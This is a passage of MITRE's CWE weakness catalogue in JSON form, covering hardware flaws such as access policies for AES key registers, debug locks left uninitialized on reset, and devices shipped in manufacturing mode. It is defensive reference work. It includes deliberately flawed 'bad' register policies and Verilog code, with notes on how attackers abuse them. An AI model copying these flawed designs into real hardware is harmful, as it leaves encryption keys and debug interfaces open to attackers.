Assumptions"]},{"xhtml:td":["Master_0","\\"00\\"","Untrusted"]},{"xhtml:td":["Master_1","\\"01\\"","Trusted"]},{"xhtml:td":["Master_2","\\"10\\"","Untrusted"]},{"xhtml:td":["Master_3","\\"11\\"","Untrusted"]}]},{"xhtml:tr":[{"xhtml:th":["Register","Field description"]},{"xhtml:td":["AES_ENC_DEC_KEY_0","AES key [0:31] for encryption or decryption, Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_1","AES key [32:63] for encryption or decryption, Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_2","AES key [64:95] for encryption or decryption, Default 0x00000000"]},{"xhtml:td":["AES_ENC_DEC_KEY_4","AES key [96:127] for encryption or decryption, Default 0x00000000"]}]}]},"Example_Code":[{"attr":{"@_Nature":"bad"},"xhtml:div":[{"#text":"If (Bus_transaction[14] == \\"1\\")Else","xhtml:div":[{"#text":"Trusted = \\"1\\"","attr":{"@_style":"margin-left:10px"}},{"#text":"Trusted = \\"0\\"","attr":{"@_style":"margin-left:10px"}}]},{"#text":"If (trusted)Else","xhtml:div":[{"#text":"Allow access to AES-Key registers","attr":{"@_style":"margin-left:10px"}},{"#text":"Deny access to AES-Key registers","attr":{"@_style":"margin-left:10px"}}]}]},{"attr":{"@_Nature":"good"},"xhtml:div":["Security_Token[4:0] = Bus_transaction[15:11]",{"#text":"If (AES_KEY_ACCESS_POLICY[Security_Token] == \\"1\\")Else","xhtml:div":[{"#text":"Allow access to AES-Key registers","attr":{"@_style":"margin-left:10px;"}},{"#text":"Deny access to AES-Key registers","attr":{"@_style":"margin-left:10px;"}}]}]}],"Body_Text":[{"xhtml:p":"The inherited policy encoding is obsolete and does not work for the new system where an untrusted bus master with an odd Security Token exists in the system, i.e., Master_3 whose Security Token is \\"11\\". Based on the old policy, the untrusted bus master (Master_3) has access to the AES-Key registers. To resolve this, a register AES_KEY_ACCESS_POLICY can be defined to provide necessary, access controls:"},{"xhtml:p":["New Policy:","The AES_KEY_ACCESS_POLICY register defines which agents with a Security Token in the transaction can access the AES-key registers. Each bit in this 32-bit register defines a Security Token. There could be a maximum of 32 security Tokens that are allowed access to the AES-key registers. The number of the bit when set (i.e., \\"1\\") allows respective action from an agent whose identity matches the number of the bit and, if \\"0\\" (i.e., Clear), disallows the respective action to that corresponding agent. Thus, any bus master with Security Token \\"01\\" is allowed access to the AES-Key registers. Below is the Pseudo Code for policy encoding:"],"xhtml:table":{"xhtml:tr":{"xhtml:td":["AES_KEY_ACCESS_POLICY","[31:0] Default 0x00000002 \u2013 agent with Security Token \\"1\\" has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_4 registers"]}}}]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"180"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1093"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-04-18"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Modes_of_Introduction, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}]}},"1268":{"attr":{"@_ID":"1268","@_Name":"Policy Privileges are not Assigned Consistently Between Control and Data Agents","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product\'s hardware-enforced access control for a particular resource improperly accounts for privilege discrepancies between control and write policies.","Extended_Description":{"xhtml:p":["Integrated circuits and hardware engines may provide access to resources (device-configuration, encryption keys, etc.) belonging to trusted firmware or software modules (commonly set by a BIOS or a bootloader). These accesses are typically controlled and limited by the hardware. Hardware design access control is sometimes implemented using a policy. A policy defines which entity or agent may or may not be allowed to perform an action. When a system implements multiple levels of policies, a control policy may allow direct access to a resource as well as changes to the policies themselves.","Resources that include agents in their control policy but not in their write policy could unintentionally allow an untrusted agent to insert itself in the write policy register. Inclusion in the write policy register could allow a malicious or misbehaving agent write access to resources. This action could result in security compromises including leaked information, leaked encryption keys, or modification of device configuration."]},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This weakness may be introduced during the design of a device when the architect does not comprehensively specify all of the policies required by an agent."},{"Phase":"Implementation","Note":"This weakness may be introduced during implementation if device policy restrictions do not sufficiently constrain less-privileged clients."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Modify Memory","Read Memory","DoS: Crash, Exit, or Restart","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Bypass Protection Mechanism","Read Files or Directories","Reduce Reliability"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"Access-control-policy definition and programming flow must be sufficiently tested in pre-silicon and post-silicon testing."}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":{"xhtml:p":["Consider a system with a register for storing an AES key for encryption or decryption. The key is composed of 128 bits implemented as a set of four 32-bit registers. The key registers are resources and registers, AES_KEY_CONTROL_POLICY, AES_KEY_READ_POLICY and AES_KEY_WRITE_POLICY, and are defined to provide necessary, access controls.","The control-policy register defines which agents can write to the read-policy and write-policy registers. The read-policy register defines which agents can read the AES-key registers, and write-policy register defines which agents can program or write to those registers. Each 32-bit register can support access control for a maximum of 32 agents. The number of the bit when set (i.e., \\"1\\") allows respective action from an agent whose identity matches the number of the bit and, if \\"0\\" (i.e., Clear), disallows the respective action to that corresponding agent."]},"Example_Code":[{"attr":{"@_Nature":"bad"},"xhtml:table":{"xhtml:tr":[{"xhtml:th":["Register","Field description"]},{"xhtml:td":["AES_ENC_DEC_KEY_0",{"#text":"AES key [0:31] for encryption or decryptionDefault 0x00000000","xhtml:br":""}]},{"xhtml:td":["AES_ENC_DEC_KEY_1",{"#text":"AES key [32:63] for encryption or decryptionDefault 0x00000000","xhtml:br":""}]},{"xhtml:td":["AES_ENC_DEC_KEY_2",{"#text":"AES key [64:95] for encryption or decryptionDefault 0x00000000","xhtml:br":""}]},{"xhtml:td":["AES_ENC_DEC_KEY_3",{"#text":"AES key [96:127] for encryption or decryptionDefault 0x00000000","xhtml:br":""}]},{"xhtml:td":["AES_KEY_CONTROL_POLICY","[31:0] Default 0x00000018, meaning agent with identities \\"4\\" and \\"3\\" has read/write access to this register (i.e., AES_KEY_CONTROL_POLICY), AES_KEY_READ_POLICY, and AES_KEY_WRITE_POLICY registers"]},{"xhtml:td":["AES_KEY_READ_POLICY","[31:0] Default 0x00000002, agent with identity \\"1\\" can only read AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_3 registers"]},{"xhtml:td":["AES_KEY_WRITE_POLICY","[31:0] Default 0x00000004, agent with identity \\"2\\" can only write to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_3 registers"]}]}},{"attr":{"@_Nature":"good"},"xhtml:table":{"xhtml:tr":[{"xhtml:th":["Register","Field description"]},{"xhtml:td":["AES_KEY_CONTROL_POLICY","[31:0] Default 0x00000010, meaning only agents with an identity of \\"4\\" have read/write access to this register (i.e., AES_KEY_CONTROL_POLICY), AES_KEY_READ_POLICY, and AES_KEY_WRITE_POLICY registers"]},{"xhtml:td":["AES_KEY_READ_POLICY","[31:0] Default 0x00000002, meaning only trusted firmware with an identity of \\"1\\" can program registers: \\nAES_ENC_DEC_KEY_0, AES_ENC_DEC_KEY_1, AES_ENC_DEC_KEY_2, AES_ENC_DEC_KEY_3"]},{"xhtml:td":["AES_KEY_WRITE_POLICY","[31:0] Default 0x00000004, meaning only trusted firmware with an identity of \\"2\\" can program registers: \\nAES_ENC_DEC_KEY_0, AES_ENC_DEC_KEY_1, AES_ENC_DEC_KEY_2, AES_ENC_DEC_KEY_3"]}]}}],"Body_Text":{"xhtml:p":["In the above example, the AES_KEY_CONTROL_POLICY register has agents with identities \\"4\\"and \\"3\\" in its policy. Assuming the agent with identity \\"4\\" is trusted and the agent with identity \\"3\\" is untrusted. The untrusted agent \\"3\\" can write to AES_KEY_WRITE_POLICY with a value of 0x0000000C thus allowing write access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_3 registers.","For the above example, the control, read-and-write-policy registers\u2019 values are defined as below."],"xhtml:ol":{"xhtml:li":["The AES_KEY_CONTROL_POLICY defines which agents have write access to the AES_KEY_CONTROL_POLICY, AES_KEY_READ_POLICY, and the AES_KEY_WRITE_POLICY registers,","The AES-key registers can only be read or used by a crypto agent with identity \\"1\\" when bit #1 is set.","The AES-key registers can only be programmed by a trusted firmware with identity \\"2\\" when bit #2 is set."]}}}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"1"}}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-02-12"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations, Related_Attack_Patterns"},"Previous_Entry_Name":{"#text":"Agents Included in Control Policy are not Contained in Less-Privileged Policy","attr":{"@_Date":"2020-08-20"}}}},"1269":{"attr":{"@_ID":"1269","@_Name":"Product Released in Non-Release Configuration","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product released to market is released in pre-production or manufacturing configuration.","Extended_Description":{"xhtml:p":["Products in the pre-production or manufacturing stages are configured to have many debug hooks and debug capabilities, including but not limited to:","The above is by no means an exhaustive list, but it alludes to the greater capability and the greater state of vulnerability of a product during it\'s preproduction or manufacturing state.","Complexity increases when multiple parties are involved in executing the tests before the final production version. For example, a chipmaker might fabricate a chip and run its own preproduction tests, following which the chip would be delivered to the Original Equipment Manufacturer (OEM), who would now run a second set of different preproduction tests on the same chip. Only after both of these sets of activities are complete, can the overall manufacturing phase be called \u201ccomplete\u201d and have the \u201cManufacturing Complete\u201d fuse blown. However, if the OEM forgets to blow the Manufacturing Complete fuse, then the system remains in the manufacturing stage, rendering the system both exposed and vulnerable."],"xhtml:ul":{"xhtml:li":["Ability to override/bypass various cryptographic checks (including authentication, authorization, and integrity)","Ability to read/write/modify/dump internal state (including registers and memory)","Ability to change system configurations","Ability to run hidden or private commands that are not allowed during production (as they expose IP)."]}},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"693","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Compiled","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Other","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Integration"},{"Phase":"Manufacturing"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control","Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":"Other","Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Ensure that there exists a marker for denoting the Manufacturing Complete stage and that the Manufacturing Complete marker gets updated at the Manufacturing Complete stage (i.e., the Manufacturing Complete fuse gets blown)."},{"Phase":"Integration","Description":"Ensure that there exists a marker for denoting the Manufacturing Complete stage and that the Manufacturing Complete marker gets updated at the Manufacturing Complete stage (i.e., the Manufacturing Complete fuse gets blown)."},{"Phase":"Manufacturing","Description":"Ensure that there exists a marker for denoting the Manufacturing Complete stage and that the Manufacturing Complete marker gets updated at the Manufacturing Complete stage (i.e., the Manufacturing Complete fuse gets blown)."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"This example shows what happens when a preproduction system is made available for production.","Example_Code":[{"#text":"Suppose the chipmaker has a way of scanning all the internal memory (containing chipmaker-level secrets) during the manufacturing phase, and the way the chipmaker or the Original Equipment Manufacturer (OEM) marks the end of the manufacturing phase is by blowing a Manufacturing Complete fuse. Now, suppose that whoever blows the Manufacturing Complete fuse inadvertently forgets to execute the step to blow the fuse.","attr":{"@_Nature":"bad"}},{"#text":"Blow the Manufacturing Complete fuse.","attr":{"@_Nature":"good"}}],"Body_Text":"An attacker will now be able to scan all the internal memory (containing chipmaker-level secrets)."}},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2019-13945","Description":"Regarding SSA-686531, a hardware based manufacturing access on S7-1200 and\\nS7-200 SMART has occurred. A vulnerability has been identified in SIMATIC S7-1200 CPU family (incl. SIPLUS variants) (All versions), SIMATIC S7-200 SMART CPU family (All versions). There is an access mode used during manufacturing of S7-1200 CPUs that allows additional diagnostic functionality. The security vulnerability could be exploited by an attacker with physical access to the UART interface during boot process. At the time of advisory publication, no public exploitation of this security vulnerability was known.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13945"},{"Reference":"CVE-2018-4251","Description":"Laptops with Intel chipsets were found to be running in Manufacturing Mode. After this information was reported to the OEM, the vulnerability (CVE-2018-4251) was patched disallowing access to the interface.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4251"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"439"}}},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1103"}}},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-31"},"Modification":{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Description, Related_Attack_Patterns"}}},"1270":{"attr":{"@_ID":"1270","@_Name":"Generation of Incorrect Security Tokens","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The product implements a Security Token mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. However, the Security Tokens generated in the system are incorrect.","Extended_Description":{"xhtml:p":"Systems-On-a-Chip (SoC) (Integrated circuits and hardware engines) implement Security Tokens to differentiate and identify actions originated from various agents. These actions could be \\"read\\", \\"write\\", \\"program\\", \\"reset\\", \\"fetch\\", \\"compute\\", etc. Security Tokens are generated and assigned to every agent on the SoC that is either capable of generating an action or receiving an action from another agent. Every agent could be assigned a unique, Security Token based on its trust level or privileges. Incorrectly generated Security Tokens could result in the same token used for multiple agents or multiple tokens being used for the same agent. This condition could result in a Denial-of-Service (DoS) or the execution of an action that in turn could result in privilege escalation or unintended access."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"284","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1294","@_View_ID":"1194","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control"],"Impact":["Modify Files or Directories","Execute Unauthorized Code or Commands","Bypass Protection Mechanism","Gain Privileges or Assume Identity","Read Memory","Modify Memory","DoS: Crash, Exit, or Restart"],"Likelihood":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":{"xhtml:ul":{"xhtml:li":["Generation of Security Tokens should be reviewed for design inconsistency and common weaknesses.","Security-Token definition and programming flow should be tested in pre-silicon and post-silicon testing."]}}}},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Consider a system with a register for storing an AES key for encryption or decryption. The key is 128 bits long implemented as a set of four 32-bit registers. The key registers are assets, and register, AES_KEY_ACCESS_POLICY, is defined to provide necessary access controls. The access-policy register defines which agents, using a Security Token, may access the AES-key registers. Each bit in this 32-bit register is used to define a Security Token. There could be a maximum of 32 Security Tokens that are allowed access to the AES-key registers. When set (bit = \\"1\\") bit number allows action from an agent whose identity matches that bit number. If Clear (bit = \\"0\\") the action is disallowed for the corresponding agent.","Body_Text":[{"#text":"Let\\"s assume the system has two agents: a Main-controller and an Aux-controller. The respective Security Tokens are \\"1\\" and \\"2\\".","xhtml:table":{"xhtml:tr":[{"xhtml:th":["Register","Description","Default"]},{"xhtml:td":["AES_ENC_DEC_KEY_0","AES key [0:31] for encryption or decryption",0]},{"xhtml:td":["AES_ENC_DEC_KEY_1","AES key [32:63] for encryption or decryption",0]},{"xhtml:td":["AES_ENC_DEC_KEY_2","AES key [64:95] for encryption or decryption",0]},{"xhtml:td":["AES_ENC_DEC_KEY_3","AES key [96:127] for encryption or decryption",0]},{"xhtml:td":["AES_KEY_ACCESS_POLICY","AES key access register [31:0]",2]}]}},"An agent with a Security Token \\"1\\" has access to AES_ENC_DEC_KEY_0 through AES_ENC_DEC_KEY_3 registers. As per the above access policy, the AES-Key-access policy allows access to the AES-key registers if the security Token is \\"1\\".","Both agents have access to the AES-key registers."],"Example_Code":[{"#text":"The SoC incorrectly generates Security Token \\"1\\" for every agent. In other words, both Main-controller and Aux-controller are assigned Security Token \\"1\\".","attr":{"@_Nature":"bad","@_Language":"Other"}},{"#text":"The SoC should correctly generate Security Tokens, assigning \\"1\\" to the Main-controller and \\"2\\" to the Aux-controller","attr":{"@_Nature":"good","@_Language":"Other"}}]}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"180"}},{"attr":{"@_CAPEC_ID":"633"}}]},"Content_History":{"Submission":{"Submission_Name":"Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna, Narasimha Kumar V Mangipudi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-03-06"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Applicable_Platforms, Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Generation of Incorrect Security Identifiers","attr":{"@_Date":"2020-08-20"}}}},"1271":{"attr":{"@_ID":"1271","@_Name":"Uninitialized Value on Reset for Registers Holding Security Settings","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Security-critical logic is not set to a known value on reset.","Extended_Description":{"xhtml:p":"When the device is first brought out of reset, the state of registers will be indeterminate if they have not been initialized by the logic. Before the registers are initialized, there will be a window during which the device is in an insecure state and may be vulnerable to attack."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"665","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Access Control","Authentication","Authorization"],"Impact":"Varies by Context"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Design checks should be performed to identify any uninitialized flip-flops used for security-critical functions."},{"Phase":"Architecture and Design","Description":"All registers holding security-critical information should be set to a specific value on reset."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Shown below is a positive clock edge triggered flip-flop used to implement a lock bit for test and debug interface. When the circuit is first brought out of reset, the state of the flip-flop will be unknown until the enable input and D-input signals update the flip-flop state. In this example, an attacker can reset the device until the test and debug interface is unlocked and access the test interface until the lock signal is driven to a known state by the logic.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"Other"},"xhtml:div":{"#text":"always @(posedge clk) beginend","xhtml:div":{"#text":"if (en) lock_jtag &lt;= d;","attr":{"@_style":"margin-left:10px;"}}}},{"attr":{"@_Nature":"good","@_Language":"Other"},"xhtml:div":{"#text":"always @(posedge clk) beginend","xhtml:div":[{"#text":"if (~reset) lock_jtag &lt;= 0;","attr":{"@_style":"margin-left:10px;"}},{"#text":"else if (en) lock_jtag &lt;= d;","attr":{"@_style":"margin-left:10px;"}}]}}],"Body_Text":"The flip-flop can be set to a known value (0 or 1) on reset, but requires that the logic explicitly update the output of the flip-flop if the reset signal is active."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"74"}}},"Notes":{"Note":{"#text":"This entry is still under development and will continue to see updates and content improvements.","attr":{"@_Type":"Maintenance"}}},"Content_History":{"Submission":{"Submission_Name":"Nicole Fern","Submission_Organization":"Tortuga Logic","Submission_Date":"2020-05-15"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Modes_of_Introduction, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Name, Type"}],"Previous_Entry_Name":[{"#text":"Missing Known Value on Reset for Registers Holding Security Settings","attr":{"@_Date":"2020-08-20"}},{"#text":"Unitialized Value on Reset for Registers Holding Security Settings","attr":{"@_Date":"2021-03-15"}}]}},"1272":{"attr":{"@_ID":"1272","@_Name":"Sensitive Information Uncleared Before Debug/Power State Transition","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The product performs a power or debug state transition, but it does not clear sensitive information that should no longer be accessible due to changes to information access restrictions.","Extended_Description":{"xhtml:p":"A device or system frequently employs many power and sleep states during its normal operation (e.g., normal power, additional power, low power, hibernate, deep sleep, etc.). A device also may be operating within a debug condition. State transitions can happen from one power or debug state to another. If there is information available in the previous state which should not be available in the next state and is not properly removed before the transition into the next state, sensitive information may leak from the system."},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"226","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"CanPrecede","@_CWE_ID":"200","@_View_ID":"1000","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Compiled","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Architecture and Design"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control","Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":["Read Memory","Read Application Data"],"Likelihood":"High","Note":"Sensitive information may be used to unlock additional capabilities of the device and take advantage of hidden functionalities which could be used to compromise device security."}},"Detection_Methods":{"Detection_Method":{"Method":"Manual Analysis","Description":"Write a known pattern into each sensitive location. Enter the power/debug state in question. Read data back from the sensitive locations. If the reads are successful, and the data is the same as the pattern that was originally written, the test fails and the device needs to be fixed. Note that this test can likely be automated.","Effectiveness":"High"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","Implementation"],"Description":"During state transitions, information not needed in the next state should be removed before the transition to the next state."}},"Demonstrative_Examples":{"Demonstrative_Example":{"attr":{"@_Demonstrative_Example_ID":"DX-147"},"Intro_Text":"This example shows how an attacker can take advantage of an incorrect state transition.","Body_Text":[{"xhtml:p":"Suppose a device is transitioning from state A to state B. During state A, it can read certain private keys from the hidden fuses that are only accessible in state A but not in state B. The device reads the keys, performs operations using those keys, then transitions to state B, where those private keys should no longer be accessible."},{"xhtml:p":"After the transition to state B, even though the private keys are no longer accessible directly from the fuses in state B, they can be accessed indirectly by reading the memory that contains the private keys."}],"Example_Code":[{"attr":{"@_Nature":"bad"},"xhtml:p":"During the transition from A to B, the device does not scrub the memory."},{"#text":"For transition from state A to state B, remove information which should not be available once the transition is complete.","attr":{"@_Nature":"good"}}]}},"Observed_Examples":{"Observed_Example":{"Reference":"CVE-2020-12926","Description":"Product software does not set a flag as per TPM specifications, thereby preventing a failed authorization attempt from being recorded after a loss of power.","Link":"http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12926"}},"Functional_Areas":{"Functional_Area":"Power"},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"150"}},{"attr":{"@_CAPEC_ID":"37"}},{"attr":{"@_CAPEC_ID":"545"}},{"attr":{"@_CAPEC_ID":"546"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-1220"}}},"Content_History":{"Submission":{"Submission_Name":"Parbati Kumar Manna, Hareesh Khattri, Arun Kanuparthi","Submission_Organization":"Intel Corporation","Submission_Date":"2020-05-31"},"Modification":[{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Potential_Mitigations, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Functional_Areas"}],"Previous_Entry_Name":{"#text":"Debug/Power State Transitions Leak Information","attr":{"@_Date":"2020-08-20"}}}},"1273":{"attr":{"@_ID":"1273","@_Name":"Device Unlock Credential Sharing","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The credentials necessary for unlocking a device are shared across multiple parties and may expose sensitive information.","Extended_Description":{"xhtml:p":"\u201cUnlocking a device\u201d often means activating certain, unadvertised, debug and manufacturer-specific capabilities of a device using sensitive credentials. Unlocking a device might be necessary for the purpose of troubleshooting device problems. For example, suppose a device contains the ability to dump the content of the full system memory by disabling the memory-protection mechanisms. Since this is a highly security-sensitive capability, this capability is \u201clocked\u201d in the production part. Unless the device gets unlocked by supplying the proper credentials the debug capabilities are not available. For cases where the chip designer, chip manufacturer (fabricator), and manufacturing and assembly testers are the all employed by the same company, the compromise of the credentials are greatly reduced. However, when the chip designer is employed by one company, the chip manufacturer is employed by another company (a foundry), and the assemblers and testers are employed by yet a third company. Since these different companies will need to perform various tests on the device to verify correct device function, they all need to share the unlock key. Unfortunately, the level of secrecy and policy might be quite different at each company, greatly increasing the risk of sensitive credentials being compromised."},"Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"200","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"VHDL","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"Verilog","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Compiled","@_Prevalence":"Undetermined"}}],"Operating_System":{"attr":{"@_Class":"OS-Independent","@_Prevalence":"Undetermined"}},"Architecture":{"attr":{"@_Class":"Architecture-Independent","@_Prevalence":"Undetermined"}},"Technology":[{"attr":{"@_Name":"Other","@_Prevalence":"Undetermined"}},{"attr":{"@_Class":"Technology-Independent","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Integration"},{"Phase":"Manufacturing"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability","Access Control","Accountability","Authentication","Authorization","Non-Repudiation"],"Impact":["Modify Memory","Read Memory","Modify Files or Directories","Read Files or Directories","Modify Application Data","Execute Unauthorized Code or Commands","Gain Privileges or Assume Identity","Bypass Protection Mechanism"],"Note":"Once unlock credentials are compromised, an attacker can use the credentials to unlock the device and gain unauthorized 